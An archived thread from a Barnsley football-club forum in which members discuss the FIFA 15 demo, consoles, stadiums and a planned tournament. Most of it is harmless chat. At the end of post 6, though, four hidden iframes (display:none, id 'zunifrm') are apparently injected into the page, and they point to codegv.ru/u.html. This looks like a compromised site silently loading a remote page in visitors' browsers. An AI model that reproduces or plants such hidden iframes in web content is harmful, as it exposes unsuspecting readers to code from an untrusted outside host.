Fifa 15

Discussion in 'Bulletin Board ARCHIVE' started by Row ii Ponty, Sep 12, 2014.

1. Row

Row ii Ponty Active Member

Bus Driver
    Style:
    Barnsley (full width)
    Anybody played the demo yet.... just played the xbox one demo. got to say it looks awsome

2. Goo

Googs Well-Known Member

Home Page:
    Style:
    Barnsley (full width)
    I've played it on PS4, plays pretty well so far. Although I don't think it's graphically any better than 14 tbh. Same old EA selling something full price when there's hardly any difference to last year. I'm still daft enough to buy it though.

Tempted to try PES this year though too, it looks like a return to form this year after a number of poor PS3/360 years.

Shame ur on XBox mate, i'm sure there will be another BBS PS4 FIFA tournament in a few weeks, especially now the tournament mode is back built into FIFA 15.

Are you listening [MENTION=6844]andytyke[/MENTION] [MENTION=54065]Kes[/MENTION] [MENTION=54138]ettboy02[/MENTION] [MENTION=55404]jptykes[/MENTION] [MENTION=6714]Googs[/MENTION] [MENTION=54126]barnsleyffc[/MENTION] [MENTION=56222]StaincrossRed[/MENTION] [MENTION=54627]Darfield-Red[/MENTION] ?

3. BarnsleyReds

BarnsleyReds Well-Known Member

Style:
    XenForo - Xenith Reds
    I don't have a console these days, but I have a few extremely powerful PCs for my job. I'll probably just get it downloaded on there, plug an Xbox or PS controller in, and have a go. Better graphics on PC, but no one plays it so no online really.

4. EastStander

EastStander Active Member

Home Page:
    Style:
    Barnsley (full width)
    I like how they have all the Premier League stadia digitised - do you know if that is only on the new gen consoles or also on PS3?

5. Goo

Googs Well-Known Member

Home Page:
    Style:
    Barnsley (full width)
    Can't say for sure mate, but I have seen nothing to make me think otherwise. I would certainly think they would be on previous gen consoles. I don't know your circumstances etc, but have you thought about buying a PS4?

6. andytyke

andytyke Administrator Staff Member Admin

Home Page:
    Style:
    Barnsley (full width)
    Ill be getting it on ps4. think young un already pre ordered it for xbox360.

Not played the demo yet, tried other day but was released day later than xbox. not tried been on since
    <iframe src="about<strong></strong>://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about<strong></strong>://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe>

7. jptykes

jptykes Well-Known Member

Style:
    Barnsley (full width)
    My son is getting it for PS3. I might get it for the PS4, depends how it plays I suppose.

8. jedstar

jedstar Well-Known Member

Style:
    Barnsley (full width)
    Wish they'd extend that the League One, Barnsley's default stadium is always something akin to Gresty Road.

9. EastStander

Home Page:
    Style:
    Barnsley (full width)
    No.

Only got the PS3 because the missus bought me it for Christmas a few years back because I wanted to play MLB The Show. Don't go on it enough to justify buying another.

10. EastStander

Home Page:
    Style:
    Barnsley (full width)
    You can alter the default - I changed it to be the next level up, so I think it's the same default as Forest.

11. Goo

Googs Well-Known Member

Home Page:
    Style:
    Barnsley (full width)
    God, I was only asking. Soz like. :p

12. Whi

Whitey Guest

I've downloaded it, played a handful of games. Seems a bit of an improvement from last year on all fronts. The presentation is extraordinary. It really does feel as close to watching real football as you're going to get on a console. Commentary seems better. Really like how Tyler runs you through the starting lineup. The crowd noise seems better, with chants you'd expect from all the clubs included on the demo. Blue Moon sounds terrific, and the Poznan was nice to see after I'd scored a 30 yard free kick with Yaya. Dortmund are an absolute force on it. The best side of the ones included for me. The two Poles on the right flank are electric. I know their names, but I can't spell em.

It all looks a lot more real this year too. Not that it didn't last year like, but aye, seems smoother now. The shirt pulling and dirtied shirts/shorts are a nice touch too. If you've not got a next gen console, I'd implore you to purchase one if you want to really play FIFA. No point explaining why. Other than saying it's miles better.

The gameplay is better I reckon, less arcadey, more of a simulation of real life. The dribbling in particular looks bang on. No longer can you go charging forward willy nilly with a quick defender if he's not got the talent to do so. Whereas, once you're on the ball with Messi, Reus or Sterling you just feel the difference in class. My only gripes so far are with the shooting and keepers. The latter are unreal. Far too good. Save practically anything on target unless you're (bizarrely) either miles out or in dead close. But, this is merely a demo that is months old. Hopefully, the little defects here and there won't be as noticeable or exploitable once we get the full version released.

Can't wait to play as Barnsley in a couple of weeks.

13. EastStander

Home Page:
    Style:
    Barnsley (full width)
    How the heck do you manage that - my free kicks are like Barnsley's...skyed over the bar or a tame shot to the keeper!

14. Whi

Whitey Guest

Dunno. Probably scored one out of every 20 attempts on last years game. Twas my first attempt yesterday n all, and boom. Reight int top bag.

15. StaincrossRed

StaincrossRed New Member

Am up for that!

16. Goo

Googs Well-Known Member

Home Page:
    Style:
    Barnsley (full width)
    [MENTION=54054]Whitey[/MENTION] I thought you'd got shut of your PS4 mate?

17. Whi

Whitey Guest

Me n all, once it's released.

18. Whi

Whitey Guest

I nearly did, within the first week. I had little time to play it, and wasn't really enjoying it. But then I had a few days off work and changed my mind. I don't get more than an hour or two to play it, at best, but I do enjoy it now. Not been online with it yet, playing other folk like, but will be doing for FIFA 15.

19. Micky Finn

Micky Finn Well-Known Member

Light bender
    Style:
    Barnsley (full width)
    Related-ish - anyone else gone for the EA Access thing? £19.99 for the year gives you unlimited free EA games from the vault. Just download and play. You also get 10% off digital purchases and access to new releases 5 days before release date. Current titles in there are Battlefield 4, FIFA 14, Madden 25, Need for Speed Rivals and Peggle 2, whatever that is. They will add more games, although obviously big new releases won't pop up there straightaway.

20. Goo

Googs Well-Known Member

Home Page:
    Style:
    Barnsley (full width)
    The league is filling up nicely already lol.